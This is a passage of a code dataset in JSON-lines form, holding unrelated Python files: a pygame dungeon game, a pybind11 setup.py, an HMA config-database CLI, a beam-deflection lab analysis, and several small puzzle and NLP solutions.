-= self.nap[1]\n x1 = self.true_x\n y1 = self.true_y\n for elem in all_sprites:\n if elem.tile_type != 'empty' and elem.tile_type != 'pl':\n x2 = elem.true_x\n y2 = elem.true_y\n if (x2 < x1 < x2 + elem.w) or (\n x2 < x1 + self.w < x2 + elem.w):\n if (y2 < y1 <= y2 + elem.h) or (\n y2 < y1 + self.h < y2 + elem.h):\n if elem.tile_type == None:\n elem.kill()\n elif elem.tile_type == 'box':\n elem.destroy()\n if elem.tile_type == 'box':\n if not elem.broken:\n self.kill()\n else:\n self.kill()\n\n\nclass Player(pygame.sprite.Sprite):\n def __init__(self, pos_x, pos_y):\n super().__init__(player_group, all_sprites)\n self.true_x = pos_x * 50 + 10\n self.true_y = pos_y * 50 + 10\n self.image = player_image\n self.w = 25\n self.h = 33\n self.tile_type = 'pl'\n self.dm = 1\n self.attack_x = 0\n self.attack_y = 0\n self.fireballs_ost = 5\n self.nap = 'r'\n self.hp = 20\n self.status = 'stay'\n self.attack_end = False\n self.sound_delay = 0\n self.texture = 0\n self.rect = self.image.get_rect().move(\n 50 * pos_x + 10, 50 * pos_y + 10)\n\n def update(self, px, py):\n 
if px != 0 or py != 0:\n moving = True\n else:\n moving = False\n if self.status != 'attack' or (\n self.attack_end and self.status == 'attack'):\n if px != 0 or py != 0:\n self.status = 'move'\n if px > 0:\n self.nap = 'r'\n elif px < 0:\n self.nap = 'l'\n else:\n self.status = 'stay'\n self.rect.x += px\n self.rect.y += py\n self.true_y += py\n self.true_x += px\n move_y = py\n move_x = px\n x1 = self.true_x\n y1 = self.true_y\n for elem in all_sprites:\n if elem.tile_type == 'wall' or (\n elem.tile_type == 'box' and not elem.broken):\n x2 = elem.true_x - 15\n y2 = elem.true_y - 7\n if (x2 < x1 < x2 + elem.w) or (\n x2 < x1 + self.w < x2 + elem.w):\n if (y2 < y1 <= y2 + elem.h) or (\n y2 < y1 + self.h < y2 + elem.h):\n self.true_y -= move_y\n self.true_x -= move_x\n self.rect.x -= move_x\n self.rect.y -= move_y\n px = 0\n py = 0\n if self.sound_delay == 20 and moving:\n sound = pyglet.media.load('data\\sounds\\eg.mp3',\n streaming=False)\n sound.play()\n self.sound_delay = 0\n elif moving:\n self.sound_delay += 1\n\n def next_texture(self):\n if self.status == 'stay':\n self.texture %= 3\n self.image = idle[self.texture]\n self.texture += 1\n self.texture %= 3\n elif self.status == 'move':\n if self.nap == 'r':\n self.image = runr[self.texture]\n elif self.nap == 'l':\n self.image = runl[self.texture]\n self.texture += 1\n self.texture %= 6\n elif self.status == 'attack':\n self.texture %= 3\n if self.nap == 'r':\n self.image = attack_r[self.texture]\n else:\n self.image = attack_l[self.texture]\n self.texture += 1\n self.texture %= 3\n if self.texture == 0:\n self.attack_end = True\n\n def finish_check(self):\n for elem in tiles_group:\n if elem.tile_type == 'finish':\n x2 = elem.true_x - 17\n y2 = elem.true_y - 7\n x1 = self.true_x\n y1 = self.true_y\n if (x2 < x1 < x2 + elem.w) or (\n x2 < x1 + self.w < x2 + elem.w):\n if (y2 < y1 <= y2 + elem.h) or (\n y2 < y1 + self.h < y2 + elem.h):\n return True\n\n\ndef death_screen(screen):\n screen.fill((0, 0, 0))\n all_sprites = pygame.sprite.Group()\n pygame.display.flip()\n sprite = pygame.sprite.Sprite(all_sprites)\n sprite.image = load_image(\"gameover.jpg\")\n sprite.rect = sprite.image.get_rect()\n sprite.rect = (0, 1000)\n all_sprites.add(sprite)\n fps = 20\n clock = pygame.time.Clock()\n running = True\n r = True\n while running:\n screen.fill((0, 0, 0))\n all_sprites.draw(screen)\n if sprite.rect[1] != 0:\n sprite.rect = (0, sprite.rect[1] - 20)\n if sprite.rect[1] == 0:\n break\n pygame.display.flip()\n clock.tick(fps)\n main_menu(screen)\n\n\nclass Camera:\n def __init__(self):\n self.dx = 0\n self.dy = 0\n\n def apply(self, obj):\n obj.rect.x += self.dx\n obj.rect.y += self.dy\n\n def update(self, target):\n self.dx = -(target.rect.x + target.rect.w // 2 - width // 2)\n self.dy = -(target.rect.y + target.rect.h // 2 - height // 2)\n\n\ndef load_level(filename):\n filename = \"data/\" + filename\n with open(filename, 'r') as mapFile:\n level_map = [line.strip() for line in mapFile]\n\n max_width = max(map(len, level_map))\n\n return list(map(lambda x: x.ljust(max_width, '.'), level_map))\n\n\ndef generate_level(level):\n new_player, x, y = None, None, None\n for y in range(len(level)):\n for x in range(len(level[y])):\n if level[y][x] == '.':\n Tile('empty', x, y, 'empty')\n elif level[y][x] == '-':\n Tile('empty', x, y, 'empty')\n Tile('wall', x, y, 'wall_h')\n elif level[y][x] == '|':\n Tile('empty', x, y, 'empty')\n Tile('wall', x, y, 'wall_v')\n elif level[y][x] == 'T':\n Trap('trap', x, y)\n elif level[y][x] == 'b':\n 
Tile('empty', x, y, 'empty')\n Box('box', x, y)\n Box('box', x + 0.5, y)\n Box('box', x, y + 0.5)\n Box('box', x + 0.5, y + 0.5)\n elif level[y][x] == 's':\n Tile('empty', x, y, 'empty')\n Slime('slime', x, y)\n elif level[y][x] == 'f':\n Tile('empty', x, y, 'empty')\n Tile('finish', x, y, 'finish')\n elif level[y][x] == '@':\n Tile('empty', x, y, 'empty')\n new_player = Player(x, y)\n return new_player, x, y\n\n\ndef draw_hp(screen):\n font = pygame.font.Font(None, 50)\n text1 = font.render('hp: ' + str(player.hp), True, (100, 0, 0))\n text2 = font.render('Мана: ' + str(player.fireballs_ost), True, (0, 0, 100))\n screen.blit(text1, (0, 0))\n screen.blit(text2, (150, 0))\n\n\nstart_screen()\n\n\ndef main_menu(screen):\n global window_size\n screen.fill((100, 100, 100))\n manager = pygame_gui.UIManager(window_size)\n clock = pygame.time.Clock()\n\n start_game_btn = pygame_gui.elements.UIButton(\n relative_rect=pygame.Rect(\n (window_size[0] // 19, window_size[1] // 3.63),\n (window_size[0] // 4.75, window_size[1] // 10)),\n text='Start game',\n manager=manager\n )\n leave_game_btn = pygame_gui.elements.UIButton(\n relative_rect=pygame.Rect(\n (window_size[0] // 19, window_size[1] // 3.63 + 125),\n (window_size[0] // 4.75, window_size[1] // 10)),\n text='Leave game',\n manager=manager\n )\n fon = pygame.transform.scale(load_image('menu_fon.jpg'), window_size)\n screen.blit(fon, (0, 0))\n font = pygame.font.Font(None, 30)\n running = True\n while running:\n time_delta = clock.tick(60) / 1000.0\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n terminate()\n if event.type == pygame.USEREVENT:\n if event.user_type == pygame_gui.UI_BUTTON_PRESSED:\n if event.ui_element == start_game_btn:\n running = False\n break\n elif event.ui_element == leave_game_btn:\n exit(0)\n manager.process_events(event)\n manager.update(time_delta)\n manager.draw_ui(screen)\n pygame.display.flip()\n\n\nmain_menu(screen)\n\n# sound = pyglet.media.load('data\\music.mp3', streaming=True)\n# sound.play()\n\nmaps = ['map.txt', 'map2.txt']\nlevel = 1\ngame_end = False\n\nwhile not game_end:\n player, level_x, level_y = generate_level(load_level(maps[level - 1]))\n\n running = True\n camera = Camera()\n moving = False\n tick_move = 0\n px = 0\n br_box = load_image('br_box.png')\n py = 0\n mana_reload = 0\n win = False\n exit_g = False\n fps = 60\n tick_texture = 0\n clock = pygame.time.Clock()\n while running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n exit(0)\n if event.type == pygame.KEYDOWN and event.key == pygame.K_w:\n py = -2\n player.attack_y = -40\n player.attack_x = 0\n\n elif event.type == pygame.KEYUP and event.key == pygame.K_w:\n py = 0\n if event.type == pygame.KEYDOWN and event.key == pygame.K_s:\n py = 2\n player.attack_y = 40\n player.attack_x = 0\n elif event.type == pygame.KEYUP and event.key == pygame.K_s:\n py = 0\n if event.type == pygame.KEYDOWN and event.key == pygame.K_d:\n px = 2\n player.attack_x = 40\n player.attack_y = 0\n elif event.type == pygame.KEYUP and event.key == pygame.K_d:\n px = 0\n if event.type == pygame.KEYDOWN and event.key == pygame.K_a:\n px = -2\n player.attack_x = -40\n player.attack_y = 0\n elif event.type == pygame.KEYUP and event.key == pygame.K_a:\n px = 0\n if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:\n sound = pyglet.media.load('data\\sounds\\sword.mp3',\n streaming=False)\n sound.play()\n player.status = 'attack'\n player.attack_end = False\n player.texture = 0\n x1 = player.true_x\n y1 = player.true_y\n if 
player.attack_x > 0:\n w = player.w + player.attack_x\n x1 = player.true_x\n else:\n x1 = player.true_x - abs(player.attack_x)\n w = player.w + abs(player.attack_x)\n if player.attack_y > 0:\n h = player.h + player.attack_y\n y1 = player.true_y\n else:\n h = player.h + abs(player.attack_y)\n y1 = player.true_y - abs(player.attack_y)\n for box in boxes_group:\n x2 = box.true_x\n y2 = box.true_y\n if (x2 <= x1 <= x2 + 25) or (x2 <= x1 + w <= x2 + 25):\n if (y2 <= y1 <= y2 + 25) or (y2 <= y1 + h <= y2 + 25):\n box.destroy()\n if (x1 <= x2 <= x1 + player.w) or (\n x1 <= x2 + box.w <= x1 + player.w):\n if (y1 <= y2 <= y1 + player.h) or (\n y1 <= y2 + box.h <= y1 + player.h):\n box.destroy()\n sound = pyglet.media.load('data\\sounds\\polomka.mp3',\n streaming=False)\n sound.play()\n for enemy in enemies_group:\n x2 = enemy.true_x\n y2 = enemy.true_y\n if (x2 <= x1 <= x2 + 20) or (x2 <= x1 + w <= x2 + 20):\n if (y2 <= y1 <= y2 + 20) or (y2 <= y1 + h <= y2 + 20):\n enemy.hp -= player.dm\n enemy.image = dm_enemies[enemy.enemy_type]\n enemy.check_hp()\n enemy.w_dm = True\n sound = pyglet.media.load('data\\sounds\\slime.mp3',\n streaming=False)\n sound.play()\n if (x1 <= x2 <= x1 + player.w) or (\n x1 <= x2 + enemy.w <= x1 + player.w):\n if (y1 <= y2 <= y1 + player.h) or (\n y1 <= y2 + enemy.h <= y1 + player.h):\n enemy.hp -= player.dm\n enemy.image = dm_enemies[enemy.enemy_type]\n enemy.check_hp()\n enemy.w_dm = True\n if event.type == pygame.MOUSEBUTTONDOWN and event.button == 3:\n if player.fireballs_ost > 0:\n sound = pyglet.media.load('data\\sounds\\magic.mp3',\n streaming=False)\n sound.play()\n if player.attack_x > 0:\n nap_x = -5\n elif player.attack_x < 0:\n nap_x = 5\n else:\n nap_x = 0\n if player.attack_y < 0:\n nap_y = 5\n elif player.attack_y > 0:\n nap_y = -5\n else:\n nap_y = 0\n if player.fireballs_ost != 0:\n Fireball(player.rect.x + player.w / 2,\n player.rect.y + player.h / 2,\n player.true_x + player.w / 2,\n player.true_y + player.h / 2, (nap_x, nap_y))\n player.fireballs_ost -= 1\n player.update(px, py)\n\n for fireball in fireballs_group:\n fireball.move()\n if tick_texture == 4:\n player.next_texture()\n for enemy in enemies_group:\n enemy.next_texture()\n enemy.move()\n for fireball in fireballs_group:\n fireball.next_texture()\n for elem in trap_group:\n elem.next_texture()\n tick_texture = 0\n if mana_reload == 500:\n if player.fireballs_ost < 5:\n player.fireballs_ost += 1\n mana_reload = 0\n camera.update(player)\n for sprite in all_sprites:\n camera.apply(sprite)\n screen.fill((100, 100, 100))\n tiles_group.draw(screen)\n boxes_group.draw(screen)\n trap_group.draw(screen)\n enemies_group.draw(screen)\n player_group.draw(screen)\n fireballs_group.draw(screen)\n draw_hp(screen)\n pygame.display.flip()\n mana_reload += 1\n tick_texture += 0.5\n clock.tick(fps)\n if player.finish_check():\n win = True\n break\n if player.hp <= 0:\n win = False\n break\n\n\n def level_end_screen():\n if win:\n intro_text = [\"Поздравляю!\",\n \"Вы прошли уровень :)\",\n \"Удачи в дальнейшем прохождении.\",\n \"Она вам понадобитца...\"]\n elif exit_g:\n intro_text = [\"Зачем закрывать игру не доиграв :(\"]\n else:\n intro_text = [\"Ничего страшного\",\n \"Получится в другой раз\"]\n fon = pygame.transform.scale(load_image('fon.jpg'), window_size)\n screen.blit(fon, (0, 0))\n font = pygame.font.Font(None, 30)\n text_coord = 50\n for line in intro_text:\n string_rendered = font.render(line, True, (150, 0, 0))\n intro_rect = string_rendered.get_rect()\n text_coord += 10\n intro_rect.top = 
text_coord\n intro_rect.x = 10\n text_coord += intro_rect.height\n screen.blit(string_rendered, intro_rect)\n\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n terminate()\n elif event.type == pygame.KEYDOWN or event.type == pygame.MOUSEBUTTONDOWN:\n return\n pygame.display.flip()\n\n\n for spr in all_sprites:\n spr.kill()\n if win:\n level += 1\n if level > len(maps):\n break\n level_end_screen()\n else:\n sound = pyglet.media.load('data\\sounds\\death.mp3', streaming=False)\n sound.play()\n death_screen(screen)\n level = 1\n\n\ndef finish_screen():\n intro_text = [\"Поздравляю!\",\n \"Вы нашли выход из подземелья\",\n \"Теперь вы можете поменять карты под себя и пройти их\",\n \"До скорых встреч в загадочных подземельях\"]\n\n fon = pygame.transform.scale(load_image('finish.jpg'), window_size)\n screen.blit(fon, (0, 0))\n font = pygame.font.Font(None, 30)\n text_coord = 50\n for line in intro_text:\n string_rendered = font.render(line, True, (150, 0, 0))\n intro_rect = string_rendered.get_rect()\n text_coord += 10\n intro_rect.top = text_coord\n intro_rect.x = 10\n text_coord += intro_rect.height\n screen.blit(string_rendered, intro_rect)\n\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n terminate()\n elif event.type == pygame.KEYDOWN or event.type == pygame.MOUSEBUTTONDOWN:\n return\n pygame.display.flip()\n\n\nfinish_screen()\n","sub_path":"main file.py","file_name":"main file.py","file_ext":"py","file_size_in_byte":30770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"307164014","text":"import os\nfrom setuptools import setup, Extension\nfrom setuptools.command.build_ext import build_ext\nimport sys\nimport setuptools\nimport subprocess as sp\n\n\nclass get_pybind_include(object):\n \"\"\"Helper class to determine the pybind11 include path\n\n The purpose of this class is to postpone importing pybind11\n until it is actually installed, so that the ``get_include()``\n method can be invoked. \"\"\"\n def __init__(self, user=False):\n self.user = user\n\n def __str__(self):\n import pybind11\n return pybind11.get_include(self.user)\n\n\ndef get_jpp_include():\n return os.path.join(os.getenv(\"JPP_DIR\", \"\"), \"software\")\n\n\next_modules = [\n Extension(\n 'jppy.{}'.format(module),\n ['src/{}.cc'.format(module)],\n include_dirs=[\n get_pybind_include(),\n get_pybind_include(user=True),\n get_jpp_include()\n ],\n language='c++') for module in ['pdf', 'npe']\n]\n\n# Populating the __init__.py with submodule imports, so that one can import\n# the package and use the submodules directly with the dot-sytax.\nwith open(\"jppy/__init__.py\", \"w\") as fobj:\n fobj.write(\"\"\"from pkg_resources import get_distribution, DistributionNotFound\ntry:\n version = get_distribution(__name__).version\nexcept DistributionNotFound:\n version = \"unknown version\"\n\"\"\")\n for module in ext_modules:\n fobj.write(\"from . 
import {}\\n\".format(module.name.split('.')[1]))\n \n\n# As of Python 3.6, CCompiler has a `has_flag` method.\n# cf http://bugs.python.org/issue26689\ndef has_flag(compiler, flagname):\n \"\"\"Return a boolean indicating whether a flag name is supported on\n the specified compiler.\n \"\"\"\n import tempfile\n with tempfile.NamedTemporaryFile('w', suffix='.cpp') as f:\n f.write('int main (int argc, char **argv) { return 0; }')\n try:\n compiler.compile([f.name], extra_postargs=[flagname])\n except setuptools.distutils.errors.CompileError:\n return False\n return True\n\n\ndef cpp_flag(compiler):\n \"\"\"Return the -std=c++[11/14/17] compiler flag.\n\n The newer version is prefered over c++11 (when it is available).\n \"\"\"\n flags = ['-std=c++14', '-std=c++11']\n\n for flag in flags:\n if has_flag(compiler, flag): return flag\n\n raise RuntimeError('Unsupported compiler -- at least C++11 support '\n 'is needed!')\n\n\nclass BuildExt(build_ext):\n \"\"\"A custom build extension for adding compiler-specific options.\"\"\"\n c_opts = {\n 'msvc': ['/EHsc'],\n 'unix': [],\n }\n l_opts = {\n 'msvc': [],\n 'unix': [],\n }\n\n if sys.platform == 'darwin':\n darwin_opts = ['-stdlib=libc++', '-mmacosx-version-min=10.7']\n c_opts['unix'] += darwin_opts\n l_opts['unix'] += darwin_opts\n\n def build_extensions(self):\n ct = self.compiler.compiler_type\n opts = self.c_opts.get(ct, [])\n link_opts = self.l_opts.get(ct, [])\n if ct == 'unix':\n opts.append('-DVERSION_INFO=\"%s\"' %\n self.distribution.get_version())\n opts.append(cpp_flag(self.compiler))\n if has_flag(self.compiler, '-fvisibility=hidden'):\n opts.append('-fvisibility=hidden')\n elif ct == 'msvc':\n opts.append('/DVERSION_INFO=\\\\\"%s\\\\\"' %\n self.distribution.get_version())\n for ext in self.extensions:\n ext.extra_compile_args = opts\n ext.extra_link_args = link_opts\n build_ext.build_extensions(self)\n\n\nsetup(\n name='jppy',\n author='Tamas Gal',\n author_email='tgal@km3net.de',\n url='https://git.km3net.de/km3py/jppy',\n description='Jpp Python Package',\n packages=[\"jppy\"],\n long_description=\"jppy - Jpp Python Package\",\n ext_modules=ext_modules,\n install_requires=['pybind11>=2.4'],\n setup_requires=['pybind11>=2.4', 'setuptools_scm'],\n use_scm_version=True,\n cmdclass={'build_ext': BuildExt},\n zip_safe=False,\n)\n","sub_path":"pypi_install_script/jppy-3.3.0.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":4014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"592859156","text":"#! /usr/bin/env python3\n# Copyright (c) Facebook, Inc. and its affiliates. 
All Rights Reserved\n\n# type: ignore\n\n\"\"\"\nWrite simple configs to the HMA config database\n\"\"\"\n\nimport argparse\nfrom dataclasses import fields\nimport getpass\nimport json\nimport tempfile\nimport subprocess\nimport typing as t\nimport re\n\nfrom hmalib.lambdas.fetcher import ThreatExchangeConfig\nfrom hmalib.common import config as hmaconfig\n\nSUPPORTED_CONFIGS = [\n ThreatExchangeConfig,\n]\n\n\ndef better_bool_type(s: str):\n s = s.strip().lower()\n if s in (\"true\", \"1\"):\n return True\n if s in (\"false\", \"0\"):\n return False\n\n raise argparse.ArgumentTypeError(\"for bools use 'true' or 'false'\")\n\n\ndef get_configs(args):\n config_cls = {config_cls.__name__: config_cls for config_cls in SUPPORTED_CONFIGS}[\n args.config_type\n ]\n if args.name:\n print(config_cls.getx(args.name))\n return\n for config in config_cls.get_all():\n print(config)\n\n\ndef edit_config(args):\n \"\"\"Update a config of the chosen type\"\"\"\n kwargs = {}\n for field in fields(args.config_cls):\n kwargs[field.name] = getattr(args, field.name)\n config = args.config_cls(**kwargs)\n hmaconfig.update_config(config)\n print(config)\n\n\ndef load_defaults(_args):\n \"\"\"\n Load a hardcoded set of defaults which are useful in testing\n \"\"\"\n\n # Could also put the default on the class, but seems too fancy\n configs = [\n ThreatExchangeConfig(\n \"Test Config 1\",\n enabled=False,\n privacy_group=303636684709969,\n ),\n ThreatExchangeConfig(\n \"Test Config 2\",\n enabled=False,\n privacy_group=258601789084078,\n ),\n ]\n for config in configs:\n # Someday maybe can do filtering or something, I dunno\n hmaconfig.update_config(config)\n print(config)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument(\n \"--table\",\n default=f\"{getpass.getuser()}-HMAConfig\",\n help=\"The name of the config dynamodb table\",\n )\n subparsers = parser.add_subparsers()\n # Update\n update = subparsers.add_parser(\"update\", help=\"Add or edit a config\")\n update_subparsers = update.add_subparsers()\n for config_cls in SUPPORTED_CONFIGS:\n sub = update_subparsers.add_parser(\n config_cls.__name__, help=\"Update a config of this type\"\n )\n sub.set_defaults(config_cls=config_cls, fn=edit_config)\n for field in fields(config_cls):\n origin = t.get_origin(field.type)\n parse_type = str\n addtl_kwargs = {}\n if field.type in (str, float, int):\n parse_type = field.type\n elif field.type is bool:\n parse_type = better_bool_type\n elif field.type in (t.Set[str], t.List[str]):\n parse_type = lambda x: set(x.split(\",\"))\n else:\n raise Exception(f\"Unsupported type in config: {field.type}\")\n arg = field.name\n if arg != \"name\":\n arg = f\"--{arg}\"\n addtl_kwargs[\"required\"] = True\n sub.add_argument(\n arg,\n type=parse_type,\n metavar=re.sub(\n r\"^typing.\",\n \"\",\n re.sub(r\"<class '(.+)'>\", r\"\\1\", str(field.type)),\n ),\n help=f\"{field.name}\",\n **addtl_kwargs,\n )\n # load_examples\n ex_subparser = subparsers.add_parser(\n \"load_example_configs\", help=\"Populate db with a default set of configs\"\n )\n ex_subparser.set_defaults(fn=load_defaults)\n # get\n get_config_parser = subparsers.add_parser(\"get\", help=\"get configs\")\n get_config_parser.add_argument(\n \"config_type\",\n choices=[config_cls.__name__ for config_cls in SUPPORTED_CONFIGS],\n help=\"which config type to get\",\n )\n get_config_parser.add_argument(\"--name\", help=\"the name of the config\")\n get_config_parser.set_defaults(fn=get_configs)\n\n args = parser.parse_args()\n 
hmaconfig.HMAConfig.initialize(args.table)\n args.fn(args)\n","sub_path":"hasher-matcher-actioner/hmalib/scripts/populate_config_db.py","file_name":"populate_config_db.py","file_ext":"py","file_size_in_byte":4222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"362817165","text":"import numpy as np\nimport uncertainties.unumpy as unp\nfrom uncertainties import ufloat\nimport matplotlib.pyplot as plt\nfrom scipy.stats import linregress\nfrom scipy.optimize import curve_fit\n\n#Elastizitätsmodul des rechteckigen Stabes--------------------------------------\nAbstand, Auslenkung_vor, Auslenkung_nach = np.genfromtxt('Rohdaten/Messung1.txt', unpack=True)\nAuslenkung = Auslenkung_nach - Auslenkung_vor\nAuslenkung -= 0.001\nAuslenkung *= 1e-3 #mm in m\nAbstand *= 1e-2 #cm in m\n\nprint( Auslenkung)\n#Berechnung von F\nl, L, d, M_S, M_G = np.genfromtxt('Rohdaten/Stab1.txt', unpack=True)\nd /= 1000 #mm in m\nL /= 100 #cm in m\nM_G *= 1e-3 #g in kg\nF = 9.81 * M_G\nLx2 = L*Abstand**2 - (Abstand**3)/3\n\n#Fit\ndef f(x, m, b):\n return m*x + b\n\nparams, cov = curve_fit(f, Lx2, Auslenkung)\nerrors = np.sqrt(np.diag(cov))\n\n#Plot\nx_plot = np.linspace(0, 0.1)\nplt.plot(Lx2, Auslenkung, 'rx', label='Messdaten')\nplt.plot(x_plot, f(x_plot, *params), 'b-', label='Fit')\nplt.xlabel(r'Lx$^2 -\\frac{\\mathrm{x}^3}{3}$ /$m^3$')\nplt.ylabel(r'D(x) /m')\nplt.legend(loc='best')\nplt.tight_layout()\nplt.savefig('build/plot1.pdf')\nplt.clf()\nprint(\"Steigung\", params[0], \" +/- \", errors[0])\nm = ufloat(params[0], errors[0])\n\n#Berechnung von I\nI = (d**4) / 6\nprint(\"Flächenträgheitsmoment des rechteckigen Stabes: \", np.mean(I) ,'+/-', np.mean(errors))\n\n#Berechnung von E\nE = F / (2 * (-m) * I)\nprint(\"Elastizitätsmodul des rechteckigen Stabes: \", np.mean(E) ,'+/-', np.mean(errors))\n\n\n#Elastizitätsmodul des runden Stabes--------------------------------------------\nAbstand, Auslenkung_vor, Auslenkung_nach = np.genfromtxt('Rohdaten/Messung2.txt', unpack=True)\nAuslenkung = Auslenkung_nach - Auslenkung_vor\nAuslenkung *= 1e-3 #mm in m\nAbstand *= 1e-2 #cm in m\nprint( Auslenkung)\n\n#Berechnung von F\nl, L, d, M_S, M_G = np.genfromtxt('Rohdaten/Stab2.txt', unpack=True)\nM_G *= 1e-3\nF = 9.81 * M_G\nL *= 1e-2 #cm in m\nd *= 1e-3 #mm in m\nLx2 = L*Abstand**2 - (Abstand**3)/3\n\n#Fit\ndef f(x, m, b):\n return m*x + b\n\nparams, cov = curve_fit(f, Lx2, Auslenkung)\nerrors = np.sqrt(np.diag(cov))\n\n#Plot\nx_plot = np.linspace(0, 0.083)\nplt.plot(Lx2 , Auslenkung , 'rx', label='Messdaten')\nplt.plot(x_plot, f(x_plot, *params), 'b-', label='Fit')\nplt.xlabel(r'Lx$^2 -\\frac{\\mathrm{x}^3}{3}$ /$\\mathrm{m}^3$')\nplt.ylabel(r'D(x) /m')\nplt.legend(loc='best')\nplt.tight_layout()\nplt.savefig('build/plot2.pdf')\nplt.clf()\n\nprint(\"Steigung\", params[0], \" +/- \", errors[0])\n\nm = ufloat(params[0], errors[0])\n\n#Berechnung von I\nI = np.pi / 2 * d**4\nprint(\"Flächenträgheitsmoment des runden Stabes: \", np.mean(I) ,'+/-', np.mean(errors))\n\n#Berechnung von E\nE = F / (2 * (-m) * I)\nprint(\"Elastizitätsmodul des runden Stabes: \", np.mean(E) ,'+/-', np.mean(errors))\n\n\n#Zweiseitige Durchbiegung des runden Stabes-------------------------------------\nAbstand_L, Abstand_R, Auslenkung_vor_L, Auslenkung_vor_R, Auslenkung_nach_L, Auslenkung_nach_R = np.genfromtxt('Rohdaten/Messung3.txt', unpack=True)\nAuslenkung_L = Auslenkung_nach_L - Auslenkung_vor_L\nAuslenkung_R = Auslenkung_nach_R - Auslenkung_vor_R\nAuslenkung_R *= 1e-3\nAuslenkung_L *= 
1e-3\nAbstand_L *= 1e-2\nAbstand_R *= 1e-2\nprint( Auslenkung_R)\nprint( Auslenkung_L)\n#Berechnung von F\nl, L, d, M_S, M_G = np.genfromtxt('Rohdaten/Stab3.txt', unpack=True)\nM_G *= 1e-3\nF = 9.81 * M_G\nL *= 1e-2 #cm in m\nd *= 1e-3 #mm in m\nLx_L = 4*Abstand_L**3 -12*L*Abstand_L**2 + 9*L*Abstand_L - L**3\nLx_R = 3*L**2*Abstand_R - 4*Abstand_R**3\n\n#Fit\ndef f(x, m, b):\n return m*x + b\n\nparams, cov = curve_fit(f, Lx_L, Auslenkung_L)\nerrors = np.sqrt(np.diag(cov))\n\n#Plot links\nx_plot = np.linspace(0.86, 1.24)\nplt.plot(Lx_L, Auslenkung_L, 'rx', label='Messdaten')\nplt.plot(x_plot, f(x_plot, *params), 'b-', label='Fit')\nplt.xlabel(r'(4x$^3$ - 12Lx$^2$ + 9L^$2$x - L$^3$) /$m^3$')\nplt.ylabel(r'D(x) /m')\nplt.legend(loc='best')\nplt.tight_layout()\nplt.savefig('build/plot3_1.pdf')\nplt.clf()\n\nprint('Steigung', params[0], \" +/- \", errors[0])\n\nm = ufloat(params[0], errors[0])\n\n#Berechnung von I\nI = np.pi / 4 * d**4\nprint('flächenträgheitsmoment des 3.Stabes', np.mean(I) ,'+/-', np.mean(errors))\n\n#Berechnung von E\nE = F / (48 * m * I)\nprint('Elastizitätmodul des Stabes von links', E ,'+/-', np.mean(errors))\n\n#Fit\ndef f(x, m, b):\n return m*x + b\n\nparams, cov = curve_fit(f, Lx_R, Auslenkung_R)\nerrors = np.sqrt(np.diag(cov))\n\n#Plot rechts\nx_plot = np.linspace(0.03, 0.16)\nplt.plot(Lx_R, Auslenkung_R, 'rx', label='Messdaten')\nplt.plot(x_plot, f(x_plot, *params), 'b-', label='Fit')\nplt.xlabel(r'(3L$^2$x - 4x$^3$) /$m^3$')\nplt.ylabel(r'D(x) /m')\nplt.legend(loc='best')\nplt.tight_layout()\nplt.savefig('build/plot3_2.pdf')\nplt.clf()\n\nprint('Steigung', params[0], \" +/- \", errors[0])\n\nm = ufloat(params[0], errors[0])\n\n#Berechnung von E\nE = F / (48 * m * I)\nprint('Elastizitätmodul des Stabes von links', E ,'+/-', np.mean(errors))\n","sub_path":"v103/rechnungen.py","file_name":"rechnungen.py","file_ext":"py","file_size_in_byte":4830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"558461816","text":"from typing import List\n\n\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def binaryTreePaths(self, root: TreeNode) -> List[str]:\n str_path_list = []\n\n self.dfs(root, \"\", str_path_list)\n\n return str_path_list\n\n def dfs(self, root: TreeNode, str_path, path_list):\n if root is None:\n return\n\n if str_path == \"\":\n str_path += f\"{root.val}\"\n else:\n str_path += f\"->{root.val}\"\n\n if root.left is None and root.right is None:\n path_list.append(str_path)\n\n if root.left is not None:\n self.dfs(root.left, str_path, path_list)\n if root.right is not None:\n self.dfs(root.right, str_path, path_list)\n","sub_path":"Easy/257.py","file_name":"257.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"462499238","text":"from collections import Counter\n\n# input_lines = '''\\\n# eedadn\n# drvtee\n# eandsr\n# raavrd\n# atevrs\n# tsrnev\n# sdttsa\n# rasrtv\n# nssdts\n# ntnada\n# svetve\n# tesnvt\n# vntsnd\n# vrdear\n# dvrsen\n# enarar'''.splitlines()\n\ninput_lines = open('input.txt')\n\ncounters = []\nfor line in input_lines:\n for i, char in enumerate(line):\n if i >= len(counters):\n counters.append(Counter())\n counters[i].update([char])\n\nprint(''.join(c.most_common(1)[0][0] for c in 
counters))","sub_path":"2016/day6/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"628370252","text":"def find_min(left, right, m, log):\n length = right - left + 1\n k = log[length]\n return min(m[left][k], m[right-(1< 0):\n if(possible_sentiment.iloc[0]['priorpolarity'] == 'negative'):\n return 'negative'\n elif(possible_sentiment.iloc[0]['priorpolarity'] == 'positive'):\n return 'positive'\n else:\n return 'neutral'\n return 'neutral'\n\ndef get_lemma(meta_dict, tag):\n if tag[0] in meta_dict[\"stop_words_en\"]:\n lemma = tag[0]\n else:\n lemma = meta_dict[\"lemmatizer\"].lemmatize(tag[0], get_wordnet_pos(tag[1]))\n return (lemma, tag[1], get_sentiment(meta_dict, tag[0], get_sentiment_pos(tag[1])))\n\ndef clean_sentence(meta_dict, sentence):\n\ttext = sentence\n\t# get text and remove the artificial 